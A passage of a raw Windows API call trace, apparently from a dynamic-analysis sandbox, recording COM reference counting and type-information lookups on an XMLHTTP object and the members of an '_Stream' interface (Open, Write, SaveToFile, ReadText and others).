	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x7ffbf8960b70*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x184c18d5f0 | out: ppvObject=0x184c18d5f0*=0x0) returned 0x80004002
	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x7ffbf8960b80*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x184c18d1c8 | out: ppvObject=0x184c18d1c8*=0x0) returned 0x80004002
	[0057.423] XMLHTTP:IUnknown:AddRef (This=0x1505fc6d4f8) returned 0x4
	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x7ffbf8960b50*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x184c18d078 | out: ppvObject=0x184c18d078*=0x0) returned 0x80004002
	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x7ffbf8960b60*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x184c18d010 | out: ppvObject=0x184c18d010*=0x0) returned 0x80004002
	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x7ffbf89265f0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d000 | out: ppvObject=0x184c18d000*=0x0) returned 0x80004002
	[0057.423] CoGetContextToken (in: pToken=0x184c18d0a0 | out: pToken=0x184c18d0a0) returned 0x0
	[0057.423] CoGetContextToken (in: pToken=0x184c18d520 | out: pToken=0x184c18d520) returned 0x0
	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x7ffbf8960b90*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d5e0 | out: ppvObject=0x184c18d5e0*=0x0) returned 0x80004002
	[0057.423] XMLHTTP:IUnknown:Release (This=0x1505fc6d4f8) returned 0x3
	[0057.423] CoGetContextToken (in: pToken=0x184c18dba0 | out: pToken=0x184c18dba0) returned 0x0
	[0057.423] CoGetContextToken (in: pToken=0x184c18daa0 | out: pToken=0x184c18daa0) returned 0x0
	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x184c18dc00*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dbd0 | out: ppvObject=0x184c18dbd0*=0x1505fc6d4f8) returned 0x0
	[0057.423] XMLHTTP:IUnknown:AddRef (This=0x1505fc6d4f8) returned 0x5
	[0057.423] XMLHTTP:IUnknown:Release (This=0x1505fc6d4f8) returned 0x4
	[0057.423] XMLHTTP:IUnknown:Release (This=0x1505fc6d4f8) returned 0x3
	[0057.423] ITypeInfo:RemoteGetTypeAttr (in: This=0x1505fc6d4f8, ppTypeAttr=0x184c18e028, pDummy=0x1505f3b6bb0 | out: ppTypeAttr=0x184c18e028, pDummy=0x1505f3b6bb0*=0x0) returned 0x0
	[0057.424] ITypeInfo:LocalReleaseTypeAttr (This=0x1505fc6d4f8) returned 0x0
	[0057.424] ITypeInfo:RemoteGetDocumentation (in: This=0x1505fc6d4f8, memid=-1, refPtrFlags=0x4c18df80, pBstrName=0x184c18df78, pBstrDocString=0x184c18e030, pdwHelpContext=0x184c18df68, pBstrHelpFile=0x184c18ded0 | out: pBstrName=0x184c18df78*=0x0, pBstrDocString=0x184c18e030, pdwHelpContext=0x184c18df68*=0x0, pBstrHelpFile=0x184c18ded0*=0x0) returned 0x0
	[0057.424] SysStringByteLen (bstr="_Stream") returned 0xe
	[0057.424] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x0, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.424] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.424] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x1, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.424] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.424] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x2, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.424] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.424] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x3, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.424] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.424] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x4, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.424] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.424] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x5, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.424] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.424] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x6, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.424] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.425] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x7, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.425] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97870
	[0057.425] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=1, rgBstrNames=0x1505fc97870, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97870*="Size", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.425] SysStringByteLen (bstr="Size") returned 0x8
	[0057.425] SysStringByteLen (bstr="Size") returned 0x8
	[0057.425] CoTaskMemFree (pv=0x1505fc97870) 
	[0057.425] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.425] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x8, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.425] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97bd0
	[0057.425] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=2, rgBstrNames=0x1505fc97bd0, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97bd0*="EOS", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.425] SysStringByteLen (bstr="EOS") returned 0x6
	[0057.425] SysStringByteLen (bstr="EOS") returned 0x6
	[0057.425] CoTaskMemFree (pv=0x1505fc97bd0) 
	[0057.425] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.425] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x9, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.425] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97ad0
	[0057.425] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=3, rgBstrNames=0x1505fc97ad0, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97ad0*="Position", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.425] SysStringByteLen (bstr="Position") returned 0x10
	[0057.425] SysStringByteLen (bstr="Position") returned 0x10
	[0057.425] CoTaskMemFree (pv=0x1505fc97ad0) 
	[0057.425] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.425] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0xa, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.425] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a360
	[0057.425] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=3, rgBstrNames=0x1505fb9a360, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="Position", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.426] SysStringByteLen (bstr="Position") returned 0x10
	[0057.426] SysStringByteLen (bstr="Position") returned 0x10
	[0057.426] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.426] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.426] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0xb, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.426] CoTaskMemAlloc (cb=0x8) returned 0x1505fc978a0
	[0057.426] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=4, rgBstrNames=0x1505fc978a0, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc978a0*="Type", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.426] SysStringByteLen (bstr="Type") returned 0x8
	[0057.426] SysStringByteLen (bstr="Type") returned 0x8
	[0057.426] CoTaskMemFree (pv=0x1505fc978a0) 
	[0057.426] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.426] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0xc, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.426] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a360
	[0057.426] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=4, rgBstrNames=0x1505fb9a360, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="Type", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.426] SysStringByteLen (bstr="Type") returned 0x8
	[0057.426] SysStringByteLen (bstr="Type") returned 0x8
	[0057.426] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.426] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.426] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0xd, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.426] CoTaskMemAlloc (cb=0x8) returned 0x1505fc978c0
	[0057.426] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=5, rgBstrNames=0x1505fc978c0, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc978c0*="LineSeparator", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.426] SysStringByteLen (bstr="LineSeparator") returned 0x1a
	[0057.426] SysStringByteLen (bstr="LineSeparator") returned 0x1a
	[0057.426] CoTaskMemFree (pv=0x1505fc978c0) 
	[0057.427] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.427] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0xe, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.427] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a360
	[0057.427] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=5, rgBstrNames=0x1505fb9a360, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="LineSeparator", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.427] SysStringByteLen (bstr="LineSeparator") returned 0x1a
	[0057.427] SysStringByteLen (bstr="LineSeparator") returned 0x1a
	[0057.427] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.427] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.427] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0xf, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.427] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97880
	[0057.427] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=6, rgBstrNames=0x1505fc97880, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97880*="State", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.427] SysStringByteLen (bstr="State") returned 0xa
	[0057.427] SysStringByteLen (bstr="State") returned 0xa
	[0057.427] CoTaskMemFree (pv=0x1505fc97880) 
	[0057.427] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.427] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x10, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.427] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97850
	[0057.427] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=7, rgBstrNames=0x1505fc97850, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97850*="Mode", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.427] SysStringByteLen (bstr="Mode") returned 0x8
	[0057.427] SysStringByteLen (bstr="Mode") returned 0x8
	[0057.427] CoTaskMemFree (pv=0x1505fc97850) 
	[0057.427] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.427] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x11, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.427] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a360
	[0057.427] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=7, rgBstrNames=0x1505fb9a360, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="Mode", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.427] SysStringByteLen (bstr="Mode") returned 0x8
	[0057.427] SysStringByteLen (bstr="Mode") returned 0x8
	[0057.427] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.427] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.428] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x12, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.428] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97bd0
	[0057.428] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=8, rgBstrNames=0x1505fc97bd0, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97bd0*="Charset", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.428] SysStringByteLen (bstr="Charset") returned 0xe
	[0057.428] SysStringByteLen (bstr="Charset") returned 0xe
	[0057.428] CoTaskMemFree (pv=0x1505fc97bd0) 
	[0057.428] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.428] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x13, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.428] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a360
	[0057.428] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=8, rgBstrNames=0x1505fb9a360, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="Charset", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.428] SysStringByteLen (bstr="Charset") returned 0xe
	[0057.428] SysStringByteLen (bstr="Charset") returned 0xe
	[0057.428] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.428] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.428] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x14, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.428] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a6e0
	[0057.428] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=9, rgBstrNames=0x1505fb9a6e0, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a6e0*="Read", pcNames=0x184c18e018*=0x2) returned 0x0
	[0057.428] SysStringByteLen (bstr="Read") returned 0x8
	[0057.428] SysStringByteLen (bstr="Read") returned 0x8
	[0057.428] SysStringByteLen (bstr="NumBytes") returned 0x10
	[0057.428] SysStringByteLen (bstr="NumBytes") returned 0x10
	[0057.428] CoTaskMemFree (pv=0x1505fb9a6e0) 
	[0057.428] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.428] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x15, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.428] CoTaskMemAlloc (cb=0x30) returned 0x1505fc9b2a0
	[0057.428] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=10, rgBstrNames=0x1505fc9b2a0, cMaxNames=0x6, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc9b2a0*="Open", pcNames=0x184c18e018*=0x6) returned 0x0
	[0057.428] SysStringByteLen (bstr="Open") returned 0x8
	[0057.428] SysStringByteLen (bstr="Open") returned 0x8
	[0057.428] SysStringByteLen (bstr="Source") returned 0xc
	[0057.428] SysStringByteLen (bstr="Source") returned 0xc
	[0057.429] SysStringByteLen (bstr="Mode") returned 0x8
	[0057.429] SysStringByteLen (bstr="Mode") returned 0x8
	[0057.429] SysStringByteLen (bstr="Options") returned 0xe
	[0057.429] SysStringByteLen (bstr="Options") returned 0xe
	[0057.429] SysStringByteLen (bstr="UserName") returned 0x10
	[0057.429] SysStringByteLen (bstr="UserName") returned 0x10
	[0057.429] SysStringByteLen (bstr="Password") returned 0x10
	[0057.429] SysStringByteLen (bstr="Password") returned 0x10
	[0057.429] CoTaskMemFree (pv=0x1505fc9b2a0) 
	[0057.429] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.429] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x16, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.429] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97b00
	[0057.429] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=11, rgBstrNames=0x1505fc97b00, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97b00*="Close", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.429] SysStringByteLen (bstr="Close") returned 0xa
	[0057.429] SysStringByteLen (bstr="Close") returned 0xa
	[0057.429] CoTaskMemFree (pv=0x1505fc97b00) 
	[0057.429] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.429] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x17, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.429] CoTaskMemAlloc (cb=0x8) returned 0x1505fc978f0
	[0057.429] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=12, rgBstrNames=0x1505fc978f0, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc978f0*="SkipLine", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.429] SysStringByteLen (bstr="SkipLine") returned 0x10
	[0057.429] SysStringByteLen (bstr="SkipLine") returned 0x10
	[0057.429] CoTaskMemFree (pv=0x1505fc978f0) 
	[0057.429] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.429] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x18, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.429] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a360
	[0057.429] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=13, rgBstrNames=0x1505fb9a360, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="Write", pcNames=0x184c18e018*=0x2) returned 0x0
	[0057.430] SysStringByteLen (bstr="Write") returned 0xa
	[0057.430] SysStringByteLen (bstr="Write") returned 0xa
	[0057.430] SysStringByteLen (bstr="Buffer") returned 0xc
	[0057.430] SysStringByteLen (bstr="Buffer") returned 0xc
	[0057.430] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.430] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.430] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x19, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.430] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97b30
	[0057.430] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=14, rgBstrNames=0x1505fc97b30, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97b30*="SetEOS", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.430] SysStringByteLen (bstr="SetEOS") returned 0xc
	[0057.430] SysStringByteLen (bstr="SetEOS") returned 0xc
	[0057.430] CoTaskMemFree (pv=0x1505fc97b30) 
	[0057.430] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.430] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x1a, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.430] CoTaskMemAlloc (cb=0x18) returned 0x1505fb9a360
	[0057.430] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=15, rgBstrNames=0x1505fb9a360, cMaxNames=0x3, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="CopyTo", pcNames=0x184c18e018*=0x3) returned 0x0
	[0057.430] SysStringByteLen (bstr="CopyTo") returned 0xc
	[0057.430] SysStringByteLen (bstr="CopyTo") returned 0xc
	[0057.430] SysStringByteLen (bstr="DestStream") returned 0x14
	[0057.430] SysStringByteLen (bstr="DestStream") returned 0x14
	[0057.430] SysStringByteLen (bstr="CharNumber") returned 0x14
	[0057.430] SysStringByteLen (bstr="CharNumber") returned 0x14
	[0057.430] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.430] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.430] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x1b, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.430] CoTaskMemAlloc (cb=0x8) returned 0x1505fc97900
	[0057.430] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=16, rgBstrNames=0x1505fc97900, cMaxNames=0x1, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fc97900*="Flush", pcNames=0x184c18e018*=0x1) returned 0x0
	[0057.430] SysStringByteLen (bstr="Flush") returned 0xa
	[0057.430] SysStringByteLen (bstr="Flush") returned 0xa
	[0057.431] CoTaskMemFree (pv=0x1505fc97900) 
	[0057.431] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.431] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x1c, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.431] CoTaskMemAlloc (cb=0x18) returned 0x1505fb9a6e0
	[0057.431] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=17, rgBstrNames=0x1505fb9a6e0, cMaxNames=0x3, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a6e0*="SaveToFile", pcNames=0x184c18e018*=0x3) returned 0x0
	[0057.431] SysStringByteLen (bstr="SaveToFile") returned 0x14
	[0057.431] SysStringByteLen (bstr="SaveToFile") returned 0x14
	[0057.431] SysStringByteLen (bstr="FileName") returned 0x10
	[0057.431] SysStringByteLen (bstr="FileName") returned 0x10
	[0057.431] SysStringByteLen (bstr="Options") returned 0xe
	[0057.431] SysStringByteLen (bstr="Options") returned 0xe
	[0057.431] CoTaskMemFree (pv=0x1505fb9a6e0) 
	[0057.431] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.431] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x1d, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.431] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a360
	[0057.431] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=18, rgBstrNames=0x1505fb9a360, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="LoadFromFile", pcNames=0x184c18e018*=0x2) returned 0x0
	[0057.431] SysStringByteLen (bstr="LoadFromFile") returned 0x18
	[0057.431] SysStringByteLen (bstr="LoadFromFile") returned 0x18
	[0057.431] SysStringByteLen (bstr="FileName") returned 0x10
	[0057.431] SysStringByteLen (bstr="FileName") returned 0x10
	[0057.431] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.431] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.431] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x1e, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.431] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9a360
	[0057.431] ITypeInfo:RemoteGetNames (in: This=0x1505fc6d4f8, memid=19, rgBstrNames=0x1505fb9a360, cMaxNames=0x2, pcNames=0x184c18e018 | out: rgBstrNames=0x1505fb9a360*="ReadText", pcNames=0x184c18e018*=0x2) returned 0x0
	[0057.431] SysStringByteLen (bstr="ReadText") returned 0x10
	[0057.431] SysStringByteLen (bstr="ReadText") returned 0x10
	[0057.431] SysStringByteLen (bstr="NumChars") returned 0x10
	[0057.431] SysStringByteLen (bstr="NumChars") returned 0x10
	[0057.432] CoTaskMemFree (pv=0x1505fb9a360) 
	[0057.432] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc6d4f8) returned 0x0
	[0057.432] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc6d4f8, index=0x1f, ppFuncDesc=0x184c18e028, pDummy=0x0 | out: ppFuncDesc=0x184c18e028, pDummy=0x0) returned 0x0
	[0057.432] CoTaskMemAlloc (cb=0x18) returned 0x1505fb9a6e0
